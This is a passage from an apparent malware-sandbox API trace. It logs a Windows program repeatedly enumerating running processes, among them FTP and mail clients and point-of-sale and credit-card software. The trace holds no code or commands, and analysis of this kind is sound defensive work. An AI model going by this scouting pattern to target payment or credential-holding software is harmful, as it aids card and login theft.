pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0250.459] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0250.461] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0250.472] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0250.474] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0250.476] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0250.478] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0250.480] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0250.486] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0250.488] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0250.490] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0250.492] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0250.494] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0250.499] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0250.502] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0250.504] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0250.506] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0250.508] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0250.510] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0250.511] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0250.554] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0250.556] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0250.557] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0250.564] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0250.566] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0250.567] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0250.569] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0250.570] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0250.572] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0250.574] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0250.578] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0250.579] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0250.581] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0250.583] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0250.585] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0250.587] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0250.588] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0250.593] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0250.595] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0250.597] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0250.599] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0250.608] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0250.609] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0250.611] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0250.613] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0250.614] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0250.616] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0250.618] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0250.619] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0250.621] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0250.686] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0250.688] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0250.690] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0250.692] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0250.695] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0250.697] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0250.698] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0250.703] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0250.714] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0250.719] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0250.720] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0250.722] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0250.723] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0250.725] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0250.726] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0250.728] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.729] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.734] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0250.736] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.738] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0250.739] CloseHandle (hObject=0x17b0) returned 1 [0250.739] Sleep (dwMilliseconds=0x64) [0250.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0250.853] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.855] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0250.859] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0250.861] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.862] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0250.864] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.865] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0250.867] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0250.868] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0250.869] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.871] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.876] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0250.877] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.879] 